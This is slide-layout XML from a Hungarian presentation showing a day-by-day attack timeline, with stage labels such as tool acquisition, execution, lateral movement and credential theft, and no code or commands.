                <a:gsLst>
                  <a:gs pos="100000">
                    <a:srgbClr val="C00000"/>
                  </a:gs>
                  <a:gs pos="57000">
                    <a:srgbClr val="FFB521"/>
                  </a:gs>
                  <a:gs pos="20000">
                    <a:srgbClr val="EA6D09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86C69A73-1E71-D199-26BD-30488EEC4D5E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="53" idx="0"/>
                <a:endCxn id="51" idx="4"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="167297" y="4424878"/>
                <a:ext cx="93931" cy="1195892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3FFA829-61C1-E36F-D939-F8B34B39712D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1166808" y="5620770"/>
                <a:ext cx="2856071" cy="861774"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                    <a:gradFill>
                      <a:gsLst>
                        <a:gs pos="100000">
                          <a:srgbClr val="C00000"/>
                        </a:gs>
                        <a:gs pos="57000">
                          <a:srgbClr val="FFB521"/>
                        </a:gs>
                        <a:gs pos="20000">
                          <a:srgbClr val="EA6D09"/>
                        </a:gs>
                      </a:gsLst>
                      <a:path path="circle">
                        <a:fillToRect l="100000" t="100000"/>
                      </a:path>
                    </a:gradFill>
                  </a:rPr>
                  <a:t>Használni kívánt eszközök beszerzése</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2500" dirty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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Flowchart: Connector 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65BE528B-3A62-419E-2373-ADCD5ACB9C60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4454097" y="6351793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9B017B7B-CB55-30B4-3E58-EEECAA80602F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="53" idx="0"/>
              <a:endCxn id="49" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4573216" y="6590030"/>
              <a:ext cx="2280736" cy="1201979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120D5C0-190F-2677-ED2D-8CC26DEBB5B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3964848" y="6357880"/>
            <a:ext cx="3291343" cy="1619389"/>
            <a:chOff x="3964848" y="6357880"/>
            <a:chExt cx="3291343" cy="1619389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D4298A5-D920-8B38-75AC-C0226FC69F58}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3964848" y="6357880"/>
              <a:ext cx="3291343" cy="1619389"/>
              <a:chOff x="62122" y="4186641"/>
              <a:chExt cx="3291343" cy="1619389"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="Flowchart: Connector 57">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{871BA418-1E6E-9CBB-FEF1-7899D42203FD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3115228" y="4186641"/>
                <a:ext cx="238237" cy="238237"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartConnector">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="100000">
                    <a:srgbClr val="C00000"/>
                  </a:gs>
                  <a:gs pos="57000">
                    <a:srgbClr val="FFB521"/>
                  </a:gs>
                  <a:gs pos="20000">
                    <a:srgbClr val="EA6D09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59" name="Straight Arrow Connector 58">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B6210E-FB23-2B92-63E9-17CD338D2B33}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="60" idx="0"/>
                <a:endCxn id="58" idx="4"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="1538896" y="4424878"/>
                <a:ext cx="1695451" cy="904098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F24E4B16-69BE-0FEC-D524-BA43DA5BED73}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="62122" y="5328976"/>
                <a:ext cx="2953547" cy="477054"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                    <a:gradFill>
                      <a:gsLst>
                        <a:gs pos="100000">
                          <a:srgbClr val="C00000"/>
                        </a:gs>
                        <a:gs pos="57000">
                          <a:srgbClr val="FFB521"/>
                        </a:gs>
                        <a:gs pos="20000">
                          <a:srgbClr val="EA6D09"/>
                        </a:gs>
                      </a:gsLst>
                      <a:path path="circle">
                        <a:fillToRect l="100000" t="100000"/>
                      </a:path>
                    </a:gradFill>
                  </a:rPr>
                  <a:t>Futtatás</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2500" dirty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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Flowchart: Connector 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA898C17-8460-613E-A9A8-6D42D55B2D5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4751004" y="6365258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C89EEA90-93B0-9CAD-01F4-A61BE1EC1965}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="60" idx="0"/>
              <a:endCxn id="56" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4870123" y="6603495"/>
              <a:ext cx="571499" cy="896720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6A232BE-860E-B970-A120-F116E1D66223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8994158" y="6357880"/>
            <a:ext cx="2953547" cy="1945383"/>
            <a:chOff x="-137903" y="4186641"/>
            <a:chExt cx="2953547" cy="1945383"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Flowchart: Connector 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{136D2285-0A3A-4E68-C18C-29D4EFFA152F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F808C21-3363-04F9-9255-6C7268803252}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="9" idx="0"/>
              <a:endCxn id="7" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1338871" y="4424878"/>
              <a:ext cx="1" cy="1230092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CA21FD-3453-8056-1B9A-586831F6823F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-137903" y="5654970"/>
              <a:ext cx="2953547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rPr>
                <a:t>Oldalirányú mozgás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AF4600D-2A17-35D7-87CB-FCC26E91FAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8673913" y="6357617"/>
            <a:ext cx="2953547" cy="1327866"/>
            <a:chOff x="-137903" y="4186641"/>
            <a:chExt cx="2953547" cy="1327866"/>
          </a:xfrm>
        </p:grpSpPr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E1194995-5912-0871-99D4-A938776BBB3B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CC722C7F-DC93-2D3A-3925-F79F495E8FB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="13" idx="0"/>
              <a:endCxn id="11" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1338871" y="4424878"/>
              <a:ext cx="1" cy="227855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C70E6D9-F3FD-AF10-DDA0-C1FDB6DC2703}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-137903" y="4652733"/>
              <a:ext cx="2953547" cy="86177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rPr>
                <a:t>Hozzáférési adatok ellopása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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Kép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2904" y="0"/>
            <a:ext cx="1895740" cy="543001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Picture 174" descr="A cartoon dog with a hat and a cup&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32E09889-C9E5-68F0-A4E8-CC7D2BA9C8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596" y="1699012"/>
            <a:ext cx="2871280" cy="287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0E04A-86F2-E2CB-87CB-788CB488E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Picture 174" descr="A cartoon dog with a hat and a cup&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59194E40-4536-68E6-EFCF-DEDDEEFF33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596" y="1699012"/>
            <a:ext cx="2871280" cy="28712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596966-EC95-11D2-EAB1-3D7446F526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300" y="318451"/>
            <a:ext cx="16535400" cy="1431256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>A végzet idővonala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A8A1F18-8B46-B7C9-1883-91E3BE7E8D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1338870" y="6476999"/>
            <a:ext cx="16072830" cy="266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233A91CE-E22C-567F-C73D-B967FB0C7377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17292582" y="6357881"/>
            <a:ext cx="238237" cy="238237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8A44C62-1170-FB02-8BB7-EC7B35611D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="85610" y="6596117"/>
            <a:ext cx="2506523" cy="338554"/>
            <a:chOff x="190403" y="4233930"/>
            <a:chExt cx="2506523" cy="338554"/>
          </a:xfrm>
        </p:grpSpPr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3ACD425B-8C74-1F60-96CB-8EBC32538F1C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="70" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1443665" y="4233930"/>
              <a:ext cx="0" cy="50800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EE6C595-61C5-FC98-26F0-A19CE2CB2BC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="190403" y="4233930"/>
              <a:ext cx="2506523" cy="3385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1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Kezdet</a:t>
              </a:r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6989FBD-AC5B-D871-B262-0163CA83BC7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1338870" y="5280807"/>
            <a:ext cx="16072830" cy="1199855"/>
            <a:chOff x="1338870" y="4147713"/>
            <a:chExt cx="16072830" cy="2332949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35B0471-CAB2-3992-9F2B-C557F9542096}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1338870" y="4150094"/>
              <a:ext cx="4076934" cy="2330568"/>
              <a:chOff x="2026444" y="3572551"/>
              <a:chExt cx="2597414" cy="2330568"/>
            </a:xfrm>
          </p:grpSpPr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2208BF50-7E9A-499B-052D-A235551D97AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2026444" y="3572551"/>
                <a:ext cx="2552227" cy="2330568"/>
                <a:chOff x="39904" y="2897813"/>
                <a:chExt cx="2552227" cy="2330568"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="96" name="Straight Arrow Connector 95">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E07AE777-3CB8-FAB0-CDA8-C69F01D35EDA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="97" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="39904" y="3825378"/>
                  <a:ext cx="1298966" cy="1403003"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="25400" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="37325"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="sysDot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3B293451-8B53-2E23-39B7-AA1F2A4DCE37}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="85608" y="2897813"/>
                  <a:ext cx="2506523" cy="927565"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                    </a:rPr>
                    <a:t>Első nap</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="25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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="95" name="Straight Arrow Connector 94">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D772B263-FDF7-E0A4-D608-7357E3FD7F87}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="97" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3325410" y="4500116"/>
                <a:ext cx="1298448" cy="1399031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52D9F73-981A-3450-7379-CB3478596C2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5336825" y="4150094"/>
              <a:ext cx="4076934" cy="2330568"/>
              <a:chOff x="2026444" y="3572551"/>
              <a:chExt cx="2597414" cy="2330568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A3BAC21F-D2BA-A157-ADCB-8351BEDDBEC1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2026444" y="3572551"/>
                <a:ext cx="2552227" cy="2330568"/>
                <a:chOff x="39904" y="2897813"/>
                <a:chExt cx="2552227" cy="2330568"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="91" name="Straight Arrow Connector 90">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{466D20BE-7423-C122-A791-054FB78AD7EE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="93" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="39904" y="3825378"/>
                  <a:ext cx="1298966" cy="1403003"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="25400" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="37325"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="sysDot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5DF2E5AE-CFF0-84A7-EDB4-B848F5CE03E3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="85608" y="2897813"/>
                  <a:ext cx="2506523" cy="927565"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                    </a:rPr>
                    <a:t>Második nap</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="25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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="82" name="Straight Arrow Connector 81">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED0BBA99-30D5-1824-82B3-D4FD42434E90}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="93" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3325410" y="4500116"/>
                <a:ext cx="1298448" cy="1399031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52388DD-96C0-5416-34ED-A18F48724C90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9335593" y="4147713"/>
              <a:ext cx="4076934" cy="2330568"/>
              <a:chOff x="2026444" y="3572551"/>
              <a:chExt cx="2597414" cy="2330568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3DC0ED5C-7AB6-BEF8-D447-3AC8EEDE45F1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2026444" y="3572551"/>
                <a:ext cx="2552227" cy="2330568"/>
                <a:chOff x="39904" y="2897813"/>
                <a:chExt cx="2552227" cy="2330568"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="71" name="Straight Arrow Connector 70">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{216F111B-B970-2F64-230E-5056E8E56E8A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="80" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="39904" y="3825378"/>
                  <a:ext cx="1298966" cy="1403003"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="25400" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="37325"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="sysDot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6F3A0ADF-7593-E099-CD3A-801E18C54FCE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="85608" y="2897813"/>
                  <a:ext cx="2506523" cy="927565"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                    </a:rPr>
                    <a:t>Harmadik nap</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="25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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="68" name="Straight Arrow Connector 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7222B96-8C07-1974-9B4B-E8798483BF05}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="80" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3325410" y="4500116"/>
                <a:ext cx="1298448" cy="1399031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4D59FF9-9124-1261-528D-F7FF8714376D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13334766" y="4147713"/>
              <a:ext cx="4076934" cy="2330568"/>
              <a:chOff x="2026444" y="3572551"/>
              <a:chExt cx="2597414" cy="2330568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9F459E7-378A-F6E0-F47B-681E143F3596}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2026444" y="3572551"/>
                <a:ext cx="2552227" cy="2330568"/>
                <a:chOff x="39904" y="2897813"/>
                <a:chExt cx="2552227" cy="2330568"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="64" name="Straight Arrow Connector 63">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{118C7663-EAD8-F09E-B49B-351787168644}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="65" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="39904" y="3825378"/>
                  <a:ext cx="1298966" cy="1403003"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="25400" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="37325"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="sysDot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9E8F58B3-1D08-E888-719B-FF916C24CC70}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="85608" y="2897813"/>
                  <a:ext cx="2506523" cy="927565"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                    </a:rPr>
                    <a:t>Negyedik nap</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="25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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="63" name="Straight Arrow Connector 62">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AD38AB7-BF54-0F12-9317-109EF3E99376}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="65" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3325410" y="4500116"/>
                <a:ext cx="1298448" cy="1399031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AF662725-8F86-ACF3-0EFE-EB627493F63B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3964848" y="6357880"/>
            <a:ext cx="3291343" cy="1619389"/>
            <a:chOff x="3964848" y="6357880"/>
            <a:chExt cx="3291343" cy="1619389"/>
          </a:xfrm>
        </p:grpSpPr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D6C28D80-CFC1-3128-22AC-9665EFCE3BBE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3964848" y="6357880"/>
              <a:ext cx="3291343" cy="1619389"/>
              <a:chOff x="62122" y="4186641"/>
              <a:chExt cx="3291343" cy="1619389"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="163" name="Flowchart: Connector 162">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8F3ADAA-B357-F7AB-D5A4-5DD37D23EDF4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3115228" y="4186641"/>
                <a:ext cx="238237" cy="238237"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartConnector">
                <a:avLst/>
              </a:prstGeom>
